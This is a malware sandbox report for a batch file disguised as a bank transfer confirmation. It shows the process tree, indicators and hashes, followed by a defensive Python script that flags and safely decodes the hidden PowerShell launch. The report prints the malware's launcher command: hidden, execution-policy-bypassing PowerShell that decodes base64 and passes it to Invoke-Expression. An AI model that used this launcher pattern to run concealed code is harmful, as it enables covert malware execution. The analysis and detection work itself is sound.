Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 121s
max time network: 121s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 01/03/2025, 00:35
Static task: static1
Behavioral task: behavioral1
Sample: Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat
Resource: win7-20240903-en
Signatures: 4
Duration: 150 seconds
General
Target: Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat
Size: 62KB
MD5: 4e49fd9891d84a4dff53559ce3fb1e4c
SHA1: 6b44eb8513213887a7cf7a21a2ef75472fb32bcf
SHA256: 6036593430cc74f68abc87c13469083968dc94f011d12c50c845c1a44751e409
SHA512: feced2549a5da4ab69077b37a9cbf88824edc010cd8163025556c8c0c810b7599c1f982556bc613fa1cceee6467f2d89ad72ae467346546e4f848a4b62db2626
SSDEEP: 1536:5ImZkbmEKUgXEXzICKUnFCtb4+tD3Ezpaljp228c+:5I3Hfctb4UD3EzpVBc+
Score
8/10
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run PowerShell and hide display window.
  pid   process
  2792  powershell.exe
Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   process
  2792  powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   process
  Token: SeDebugPrivilege  2792  powershell.exe
Suspicious use of WriteProcessMemory (6 IoCs)
  description                       pid   process  procid_target
  PID 2244 wrote to memory of 2716  2244  cmd.exe  31
  PID 2244 wrote to memory of 2716  2244  cmd.exe  31
  PID 2244 wrote to memory of 2716  2244  cmd.exe  31
  PID 2716 wrote to memory of 2792  2716  cmd.exe  33
  PID 2716 wrote to memory of 2792  2716  cmd.exe  33
  PID 2716 wrote to memory of 2792  2716  cmd.exe  33
Processes
C:\Windows\system32\cmd.exe  (PID 2244)
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat"
    Suspicious use of WriteProcessMemory
  └ C:\Windows\system32\cmd.exe  (PID 2716)
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat"
        Suspicious use of WriteProcessMemory
    └ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2792)
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression"
          Command and Scripting Interpreter: PowerShell
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
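The process tree above shows a .bat in the user's Temp directory run by cmd /c, re-launching itself with cmd /K, and finally starting a hidden, execution-policy-bypassing PowerShell that base64-decodes a string and pipes it to Invoke-Expression. The following Python script is an added example and is not part of the tria.ge report: it rebuilds that parent/child chain from constructed process-creation events (PIDs, images and the cmd.exe command lines are taken from the report; the parent of PID 2244 and the base64 payload are constructed stand-ins, since the report elides the real payload), flags the same indicators, and decodes the payload without evaluating it. It goes beyond the report in also handling the -EncodedCommand form, which is UTF-16LE rather than UTF-8.

```python
import base64
import binascii
import re

# Constructed process-creation events modelled on the report's tree. PIDs, images and the
# two cmd.exe command lines come from the report; the parent of PID 2244 is not shown there,
# and the base64 payload is a constructed stand-in because the report elides the real one.
STAGE2 = "Write-Host 'constructed stage-2 placeholder'"
B64 = base64.b64encode(STAGE2.encode("utf-8")).decode("ascii")
BAT = r"C:\Users\Admin\AppData\Local\Temp\Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

EVENTS = [
    {"pid": 2244, "ppid": 0, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": 'cmd /c "' + BAT + '"'},
    {"pid": 2716, "ppid": 2244, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /K " + '"' + BAT + '"'},
    {"pid": 2792, "ppid": 2716, "image": PS,
     "cmdline": '"' + PS + '" -noprofile -windowstyle hidden -ep bypass -Command '
                '"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\''
                + B64 + '\')) | Invoke-Expression"'},
]
# Second constructed line: the same payload delivered via -EncodedCommand (always UTF-16LE).
ENC_SAMPLE = "powershell -nop -w hidden -enc " + base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")

# Heuristics for the flags seen in the report, written to also catch PowerShell's
# abbreviated parameter forms (-w hidden, -w h, -ex bypass, -exec bypass).
HIDDEN = re.compile(r"-w[a-z]*\s+h[a-z]*", re.I)
BYPASS = re.compile(r"-e[a-z]*\s+bypass", re.I)
IEX = re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I)
B64_ARG = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
ENCODING = re.compile(r"\[(?:System\.)?Text\.Encoding\]::(UTF8|Unicode|ASCII)\.GetString", re.I)
ENC_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
BAT_TEMP = re.compile(r'appdata\\local\\temp\\[^"]*\.bat', re.I)
CODECS = {"utf8": "utf-8", "unicode": "utf-16-le", "ascii": "ascii"}


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image basenames from pid up to the root, e.g. ['powershell.exe', 'cmd.exe', 'cmd.exe']."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # 'seen' guards against PID-reuse loops in real logs
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def decode_payload(cmdline):
    """Return the decoded stage-2 text, or None. Decodes only; never evaluates it."""
    m = B64_ARG.search(cmdline)
    if m:
        enc = ENCODING.search(cmdline)
        codec = CODECS.get(enc.group(1).lower(), "utf-8") if enc else "utf-8"
        blob = m.group(1)
    else:
        m = ENC_CMD.search(cmdline)
        if not m:
            return None
        blob, codec = m.group(1), "utf-16-le"
    try:
        return base64.b64decode(blob, validate=True).decode(codec, errors="replace")
    except (binascii.Error, ValueError):
        return None


def analyze(events):
    """Return {pid: [findings]} for the bat -> cmd -> hidden PowerShell pattern in the report."""
    results = {}
    for e in events:
        name, cmd, findings = basename(e["image"]), e["cmdline"], []
        if name in ("powershell.exe", "pwsh.exe"):
            if HIDDEN.search(cmd):
                findings.append("hidden_window")
            if BYPASS.search(cmd):
                findings.append("ep_bypass")
            if B64_ARG.search(cmd) and IEX.search(cmd):
                findings.append("base64_iex")
            if ENC_CMD.search(cmd):
                findings.append("encoded_command")
            if "cmd.exe" in ancestry(events, e["pid"])[1:]:
                findings.append("spawned_by_cmd")
        elif name == "cmd.exe" and BAT_TEMP.search(cmd):
            findings.append("bat_from_temp")
        if findings:
            results[e["pid"]] = findings
    return results


if __name__ == "__main__":
    for pid, hits in analyze(EVENTS).items():
        print(pid, " -> ".join(ancestry(EVENTS, pid)), hits)
    print("decoded stage 2:", decode_payload(EVENTS[2]["cmdline"]))
```

Decoding rather than running the stage is the point: the report's score comes from the launch flags, but what the decoded script does next (download, load, persist) is what an analyst needs to know before acting on the alert. The regexes approximate PowerShell's prefix-matched parameter names and will miss obfuscation such as string concatenation or backtick escapes; the process-tree check is what still holds when the command line is obfuscated.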